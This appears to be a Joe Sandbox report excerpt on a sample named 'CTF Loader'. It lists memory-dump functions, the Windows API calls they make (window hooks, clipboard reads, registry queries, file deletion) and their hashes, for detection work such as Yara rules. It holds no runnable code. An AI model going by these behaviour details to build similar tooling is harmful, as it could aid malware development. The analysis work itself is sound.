Source File: 00000004.00000002.4113327345.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bb0000_CTF Loader.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8fc96115ddae3e52396b518d5a5147635a24409bdac45529029cad3e827b9f2b
Instruction ID: 803f0868943c874ac8109b17d624f6788a3e931283c46ca07c263fe89518d0b7
Opcode Fuzzy Hash: 8fc96115ddae3e52396b518d5a5147635a24409bdac45529029cad3e827b9f2b
Instruction Fuzzy Hash: 4151C0B1D103099FDB14CFA9C884ADEBBF1FF48310F24816AE459AB220D7749985CF90

Function 00BBD59C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BBE90A

Memory Dump Source

Source File: 00000004.00000002.4113327345.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bb0000_CTF Loader.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c5fb2792a767c5ccf6a9e60fceebec9b2f4c5a254ce272166d37a639385f17a5
Instruction ID: b7468d20917e9d34e930638f3048ef872e4beeb2a0d064217a80fa00a81c483d
Opcode Fuzzy Hash: c5fb2792a767c5ccf6a9e60fceebec9b2f4c5a254ce272166d37a639385f17a5
Instruction Fuzzy Hash: 8651B0B1D003199FDB14CF99C884ADEBBF5FF48310F24816AE459AB220D770A945CF90

Function 05FC6280 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05FC6380

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c14d9ecf9b44493bb5dc2dd7b5793d83ef4d0270da1f7376b2715503fed7dbdd
Instruction ID: d7dcf64758c32435d1d5673ce08810c91b9cef06d26d901074bfa6cc336d85c1
Opcode Fuzzy Hash: c14d9ecf9b44493bb5dc2dd7b5793d83ef4d0270da1f7376b2715503fed7dbdd
Instruction Fuzzy Hash: 3B415B70E10A01CFC728EF38DA9456E7AE2FB85304B1089BED157DA265DB36D886DB40

Function 00771C98 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00771D87

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7fe8b2296bd7c9d12f951f272cc0dedcbbfc4bbc5fb4b583f9a8bccf7e40c9d
Instruction ID: 38d916472397729c27ee433f4bdbe227ef91b6fa58dedfb961860e47999b25c5
Opcode Fuzzy Hash: d7fe8b2296bd7c9d12f951f272cc0dedcbbfc4bbc5fb4b583f9a8bccf7e40c9d
Instruction Fuzzy Hash: FD41C330A00700CFCB28BF79D95067E77E6FB85745B60C82ED41AD7255CB7AD8469B40

Function 00771C88 Relevance: 1.6, APIs: 1, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00771D87

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 869c14502a00477053b116f07f5b553407a815519fcd509b5ecbf235216bf9d3
Instruction ID: 1adc3e472bc9c480fefdb8bf2f61731497f62a649e38e7dff0fb72f53e363138
Opcode Fuzzy Hash: 869c14502a00477053b116f07f5b553407a815519fcd509b5ecbf235216bf9d3
Instruction Fuzzy Hash: E641C330E00600CFCB28AF79D85067E77E2FB85745B60C82ED81A97355C776D946EB80

Function 067D6AA4 Relevance: 1.6, APIs: 1, Instructions: 106libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 067D6AC7

Memory Dump Source

Source File: 00000004.00000002.4122281604.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e437b816d0f5baf70a7c9c18f1f23e0269c2d87e32c38776f4985e622974dc3
Instruction ID: 915d99852350e4ccb9bbbb868daec9eaa62e26d591b3153a9cd07c23bfe97ba8
Opcode Fuzzy Hash: 4e437b816d0f5baf70a7c9c18f1f23e0269c2d87e32c38776f4985e622974dc3
Instruction Fuzzy Hash: CC417E30B112298FCB54EB24D85866D7AF2FF84705F2488ADD409E7394DE389D86CF90

Function 067D6A9B Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 067D6AC7

Memory Dump Source

Source File: 00000004.00000002.4122281604.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930cb6898134fea800226afefc67c4fbc54d1da87ae681514db1ed37cc32b3d5
Instruction ID: 0f7499c2c0df3b470d162b89d0b97460a8974ec0f19732e1dc1cf8e24fe279e9
Opcode Fuzzy Hash: 930cb6898134fea800226afefc67c4fbc54d1da87ae681514db1ed37cc32b3d5
Instruction Fuzzy Hash: F8319C30B11219CFDB54AB24C85476D7AF2FF84705F2488ADD809A7394DE389986CF90

Function 05FC201C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05FC3411

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 08840ac1a674bab50ca9371fa3092e0a41e0963c48362de4d48e9078051a018c
Instruction ID: 70f1923f8589e4b11d6de7001067d5398e88399d8dbf8f4cbac04eb507285204
Opcode Fuzzy Hash: 08840ac1a674bab50ca9371fa3092e0a41e0963c48362de4d48e9078051a018c
Instruction Fuzzy Hash: 084129B5900305DFDB14CF99C448AAABBF6FB88314F24C8A9D519AB361D775A841CFA0

Function 065DE064 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 065DE129

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6e9933e5e9ea73ebf2df8397cb3f18bc01056863dc8498cee4103dda9c5e509d
Instruction ID: 2f0d3e50cf2f1c7ad19417f1d940189c64e2b2b8b53e0ea6d5de829fdce0bbcf
Opcode Fuzzy Hash: 6e9933e5e9ea73ebf2df8397cb3f18bc01056863dc8498cee4103dda9c5e509d
Instruction Fuzzy Hash: 8741DEB1D002589FCB20CF9AC985A9EBBF5BF48350F14802AE859AB350D7719945CFA1

Function 065DBB4C Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 065DE129

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: eb9a041600600d134ecae35a380dcf245136172251aa01a88b254981c15150c1
Instruction ID: 5992bce3d6b5819c27d57be8d373f2366250fe9338197404f0c58fcdca0729b8
Opcode Fuzzy Hash: eb9a041600600d134ecae35a380dcf245136172251aa01a88b254981c15150c1
Instruction Fuzzy Hash: 8631D1B1D00258DFCB60DF9AC985A9EBBF5BF48750F14802AE819AB350D770A945CFA1

Function 065DDE2C Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 065DDEEC

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4796b95b16d75dc4081cee1c012eb1d4766a3036cf2756df5fa7c1066f760667
Instruction ID: bf9da6a821970ec12cc93936f8491df7628a251f8942d6f102dc9093ce242ea8
Opcode Fuzzy Hash: 4796b95b16d75dc4081cee1c012eb1d4766a3036cf2756df5fa7c1066f760667
Instruction Fuzzy Hash: A7310EB1C012498FDB20CF99C584A8EFFF5BF48304F24866AE809AB355C7759885CFA4

Function 065DBB40 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 065DDEEC

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2b67b1701a774db6e4c38e59952d021d16d1036abf4a3c0c87947eee16463199
Instruction ID: f55488ca38dfcf0d34977928dc19cbda5a7e149b9a04d9bb2086da87ac4c1330
Opcode Fuzzy Hash: 2b67b1701a774db6e4c38e59952d021d16d1036abf4a3c0c87947eee16463199
Instruction Fuzzy Hash: 0D31FFB0D012498FDB60CF99C584A9EFFF5BF48304F24866AE809AB355C7759884CF94

Function 065DF39C Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 065DF430

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 1895510d7653dbe89445ca6bf907c6ccb3e278760697445374e8170f8ba6a052
Instruction ID: 90b88a57ff9a9ae33488c176bf0f2c08a46856aaffa2b727ed73dad781b94147
Opcode Fuzzy Hash: 1895510d7653dbe89445ca6bf907c6ccb3e278760697445374e8170f8ba6a052
Instruction Fuzzy Hash: D33112B0901208DFDB20CF99C984BCDBBF5BF48314F248459E485AB290D7B46985CFA5

Function 065DEE48 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 065DF430

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 23f8f61e954d293831f2d03cba30724fc4e154699697b7088f7198ab744747d6
Instruction ID: 08745fe1c47a3b9d0a1f1d7aa7357d9015bc3bde8d28057a5898a8b6cfde2162
Opcode Fuzzy Hash: 23f8f61e954d293831f2d03cba30724fc4e154699697b7088f7198ab744747d6
Instruction Fuzzy Hash: E13102B0D01248DFDB60CF99C984B9DBBF5BF48318F248069E445BB290D7B4A945CFA5

Function 00779710 Relevance: 1.6, APIs: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 007797B5

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0513eee24e9ef1ead960dafdcc847c1de68cbad01c67417474add57676dc6a3e
Instruction ID: 5d5303436dd25ca47d8c5f6feeae3e5ee14bed62661ff1b04b94749420ed9daf
Opcode Fuzzy Hash: 0513eee24e9ef1ead960dafdcc847c1de68cbad01c67417474add57676dc6a3e
Instruction Fuzzy Hash: E421ACB4805348CFCB11CFA8C984ADEBBF4EF48310F16C85AE494A7651C739AA45CFA1

Function 05FC1EB8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05FC24EE,?,?,?,?,?), ref: 05FC25AF

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 27d7aca45581e5b3cf4352a0b25bb080814cefcdb49b10c810721447418d614e
Instruction ID: bf630f96f7971f96a687d5d21aa54c78cb4336f10e982af48e8bf11e49424e9b
Opcode Fuzzy Hash: 27d7aca45581e5b3cf4352a0b25bb080814cefcdb49b10c810721447418d614e
Instruction Fuzzy Hash: D021E3B59002199FDB10CF9AD984ADEBFF9FB48310F14846AE958B7350D378A940CFA5

Function 05FC2520 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05FC24EE,?,?,?,?,?), ref: 05FC25AF

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e7abf1a86ca5385d15e60825369dcb27f364be5070912492bb8997ad4a216c33
Instruction ID: 5f3296054b80b5dd6504874358f710cb9c6505d1c2a2625cb0f860a74ce61493
Opcode Fuzzy Hash: e7abf1a86ca5385d15e60825369dcb27f364be5070912492bb8997ad4a216c33
Instruction Fuzzy Hash: 6D2103B59002199FDB10CFAAD584ADEBFF5FB48310F14846AE958B7310D378A944CFA0

Function 065DFE38 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 065DFEBB

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e7cd4489b5cd3b9980ff00c71cab01e95a54c6e4234e7b8ace6c280bf64a2075
Instruction ID: 0bed67826468a9c6237afc45d4b27fd1e7dbb70d83b0b77590a9b405471a9596
Opcode Fuzzy Hash: e7cd4489b5cd3b9980ff00c71cab01e95a54c6e4234e7b8ace6c280bf64a2075
Instruction Fuzzy Hash: AD2104B59002099FCB64CF99C844BEEFBF5FB88310F10842AE499A7250CB75A945CFA5

Function 065DFE40 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 065DFEBB

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ef5ed85df6819b8d5d21898e06d870a3959c79b0c9976a8d111885623b0085c5
Instruction ID: 339ff84bb612d02642970386e28c368759cab872b3dda748577dd0ffde4caddc
Opcode Fuzzy Hash: ef5ed85df6819b8d5d21898e06d870a3959c79b0c9976a8d111885623b0085c5
Instruction Fuzzy Hash: 3421E0B5D002199FDB54DF9AC844BEEFBF5FB88320F10842AE459A7290C774A944CFA5

Function 065DAED2 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 065DAF1F

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21c30ab2a0006f9064b0aec66fbda0d9a71d644f99acec10f1988841d6728a7e
Instruction ID: 141f7477cfa12a8f1a9b8f3151076b5955a8d49c5a4290eeb8470cf2f100a935
Opcode Fuzzy Hash: 21c30ab2a0006f9064b0aec66fbda0d9a71d644f99acec10f1988841d6728a7e
Instruction Fuzzy Hash: 1E214F70D10609DFCB24EFA9D884AAEBBB2FF85341F51856CE00167395DB369846CF94

Function 05FC71D0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 05FC7240

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 66a42306f3340f4103b69259dcac66e93cf95c1b331920389e278fe325e98ae7
Instruction ID: 0ad6924ff8e5d3455d924b4ae59150a116d5f930894b4a08f76d7fbebb1f0dc5
Opcode Fuzzy Hash: 66a42306f3340f4103b69259dcac66e93cf95c1b331920389e278fe325e98ae7
Instruction Fuzzy Hash: FD1122B1C0066A9BCB10DF9AD544BDEFBF4FF48320F11816AE859A7254D738A940CFA5

Function 05FC71C8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 05FC7240

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 031ec4d85fc36937d57c4bf4294757a27a53e19df407eb77bd2c69876cdef772
Instruction ID: 54154c6d7153a014e24418a963dca14703fa5c2f72de72e8367b4b7e6810e837
Opcode Fuzzy Hash: 031ec4d85fc36937d57c4bf4294757a27a53e19df407eb77bd2c69876cdef772
Instruction Fuzzy Hash: 082147B5C0061A8BCB10DF9AC545BDEFBB0FF08320F15816AD859B7254D338A940CFA4

Function 00BBC564 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00BBD3B6

Memory Dump Source

Source File: 00000004.00000002.4113327345.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_bb0000_CTF Loader.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9e694a5913f4f8571edacea0d19cf48fd6ecee8239f04828cacc80910039c889
Instruction ID: 8146a826d1deb780fefd9c9dd11adcf6f96be20a723f5943e0eac24d0b45467d
Opcode Fuzzy Hash: 9e694a5913f4f8571edacea0d19cf48fd6ecee8239f04828cacc80910039c889
Instruction Fuzzy Hash: AB1120B68003098FDB10DF9AC444BEEFBF4EB88314F14846AD459B7211D3B9A945CFA5

Function 065DBBAC Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,065DEA17), ref: 065DEAA7

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a549da1a19855903387c718c894054ef3b7091a112054bdb9fba2cc8b4f133fa
Instruction ID: ccc59e1708a3908844775a0cca23d10f74fc3c9133be0ab15282fe4e9eb94408
Opcode Fuzzy Hash: a549da1a19855903387c718c894054ef3b7091a112054bdb9fba2cc8b4f133fa
Instruction Fuzzy Hash: 4E1110B19002498FDB20DF9ED449B9EFBF4FB48320F24846AE559AB250C774A940CFA4

Function 00779BF0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00779C55

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ea7d6d316b0c0deff742bba2519899b9d4ac6e2e006d2755e6820b70104492f5
Instruction ID: 490547e401bb68e83fbbfbcb116763a8ae3dfbed3a4e61314c99c9c41c9eb36a
Opcode Fuzzy Hash: ea7d6d316b0c0deff742bba2519899b9d4ac6e2e006d2755e6820b70104492f5
Instruction Fuzzy Hash: D5113AB5800309CFDB10CF99C585BEEBBF4EB48310F14841AD598B3650C378A984CFA5

Function 00779BF8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00779C55

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e2417a1df0bc855dcd4bf326042a9a08caa7ad6b8b372e04f1c5bf9cc0a7d68f
Instruction ID: ddff7ace2adce08d5fa0d0d973362cfe5f4c1561098b7b8d6857acdb1f951947
Opcode Fuzzy Hash: e2417a1df0bc855dcd4bf326042a9a08caa7ad6b8b372e04f1c5bf9cc0a7d68f
Instruction Fuzzy Hash: DB110AB5800349DFDB10CF9AC545BDEFBF8EB48324F108459D558A3650D378A584CFA5

Function 065DF259 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 065DF2B5

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 7181ca00d133681ad8b536f9c99211374918ffc1f1f7f05fae4babf6388577f2
Instruction ID: f7a3a752c60ad58d56d6259c5b1cffed8aafe1097eb79b374e2998d7fb37ffe0
Opcode Fuzzy Hash: 7181ca00d133681ad8b536f9c99211374918ffc1f1f7f05fae4babf6388577f2
Instruction Fuzzy Hash: F411F2B58002488FCB20DF9AD944BCEBBF4EF48324F20845AD599A7650C375A584CFA5

Function 065DEA42 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,065DEA17), ref: 065DEAA7

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ec6fcb8b9d5ac92b45a596222143aa59bab2992550fd1f38e299686b09b5ee62
Instruction ID: 1e3210547f0c5e58c03f33d05c99e5ebe8d9813ff6295320296790fb19a00749
Opcode Fuzzy Hash: ec6fcb8b9d5ac92b45a596222143aa59bab2992550fd1f38e299686b09b5ee62
Instruction Fuzzy Hash: 3D1113B1900249CFCB20DF99D449BDEFBF4BB48324F24845AD499A7650C774A944CFA4

Function 05FC6ED8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02436428,?,?,?,?,?,?,05FC80A0,00000000,00000000,?), ref: 05FC822D

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: ae188ffa1a0a8e147b1f156beefca37bc748f4b65d33141cb3687a2169565234
Instruction ID: 970970836f7b9f5e53e57d99f91c66c247d31cab2eb6b6caa1fbe003cfe10835
Opcode Fuzzy Hash: ae188ffa1a0a8e147b1f156beefca37bc748f4b65d33141cb3687a2169565234
Instruction Fuzzy Hash: C511E3B58003499FDB10DF99D588BDEBFF8EB48320F108459E559A7610C375A944CFA5

Function 065DED30 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 065DF2B5

Memory Dump Source

Source File: 00000004.00000002.4122012969.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65d0000_CTF Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: fce3562be6d6faaf61a9c6570a4abad0723c54fd5775cb503481204076f6b708
Instruction ID: 2c0100536895887182e88cdbb41aaa7eb9c5adf3595d211fcb470420b2af8caf
Opcode Fuzzy Hash: fce3562be6d6faaf61a9c6570a4abad0723c54fd5775cb503481204076f6b708
Instruction Fuzzy Hash: 991133B59003488FDB60DF9AC844B9EBBF4EB48328F108459D559B7250C374A940CFA4

Function 05FC81CB Relevance: 1.5, APIs: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02436428,?,?,?,?,?,?,05FC80A0,00000000,00000000,?), ref: 05FC822D

Memory Dump Source

Source File: 00000004.00000002.4121153034.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5fc0000_CTF Loader.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: b8a3edb4502def4bcc5e0d0cf8731151d0a16c0ff6fe7556c484aa8d6eaa41a3
Instruction ID: 3c465a76d8df0358a91ccdb8a98e6cdc1563d8a40856e93a4efe9195f23c96bd
Opcode Fuzzy Hash: b8a3edb4502def4bcc5e0d0cf8731151d0a16c0ff6fe7556c484aa8d6eaa41a3
Instruction Fuzzy Hash: CD11F2B58003499FDB20DF9AD989BDEBFF8EB48320F10845AE559A7210C375A584CFA1

Function 00779758 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 007797B5

Memory Dump Source

Source File: 00000004.00000002.4111980244.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_770000_CTF Loader.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d95d2e9b6d3c03f2e73529cda3511321eecd356cd6d0a9d9e5af5914854d71d0
Instruction ID: 01cb96dc7c7321883c1ab26164f2df1885990fe65f8901a279191bc4120bbdd8
Opcode Fuzzy Hash: d95d2e9b6d3c03f2e73529cda3511321eecd356cd6d0a9d9e5af5914854d71d0
Instruction Fuzzy Hash: 4F11D0B58003499FDB10DF9AC985BDEBBF8EB48324F10845AE558A7610C379A984CFA5

Function 00A1D9A1 Relevance: 1.1, Instructions: 1108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4112832763.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

